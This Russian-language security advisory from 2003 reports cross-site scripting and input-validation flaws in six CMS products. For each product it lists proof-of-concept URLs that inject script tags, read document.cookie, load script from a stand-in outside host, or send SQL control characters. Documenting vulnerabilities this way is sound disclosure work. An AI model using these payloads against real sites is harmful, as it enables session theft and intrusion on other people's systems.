Межсайтовый скриптинг в нескольких популярных CMS системах

Дата публикации:
25.03.2003
Всего просмотров:
1701
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость в проверке правильности ввода обнаружена в нескольких CMS системах (ezPublish, DCP-Portal, Nuked-klan, Siteframe, Mambo Site Server, Basit cms). Удаленный пользователь может выполнить XSS нападение.

Ertan Kurt попытался найти безопасную CMS систему для своего сайта. В результате поиска, он обнаружил несколько XSS уязвимостей во многих популярных CMS системах. Пример:

ezPublish 2.2.7
http://target/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</sc
ript>
also when entered an URL like
http://target/<script>alert('test')</script> and site admin checks
latest served URLs the script will run
Vendor Site: http://www.ez.no

DCP-Portal v5.3.1
http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></scrip
t>
http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&
day=05
Vendor Site: http://www.dcp-portal.org

Nuked-klan 1.3b
it doesn work if it starts with <script but by adding a "> the script will run
http://target/index.php?file=Liens&op="><script>alert('test');</script>
Vendor Site: http://www.nuked-klan.org

Siteframe 2.2.4
Same "> issue here
http://target/search.php?searchfor="><script>alert('test');</script>
http://target/download.php?id=2%  (shows some info)
Vendor Site: http://www.siteframe.org

Mambo Site Server 4.0 build 10
http://target/index.php?option=search&searchword=<script>alert(document.cookie);</script>
Vendor Site: http://www.mamboserver.com

Basit cms 1.0
Content module: // Some sql chars and unwanted behaviour (loop->DoS?)
http://target/modules/Content/?op=sec&s=--
http://target/modules/Content/?op=sec&s='
http://target/modules/Content/?op=sec&s=;
Submit module:
http://target/modules/Submit/index.php?op=pre&title=<script%20src="http://othersite/code.
js">test</script>
http://target/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</scr
ipt>
Search module:
http://target/modules/Search/index.php?q="><script+src=http://othersite/code.js></sc
ript>&op=search
Vendor Site: http://basitonline.com



Ссылки: Some XSS vulns
или введите имя

CAPTCHA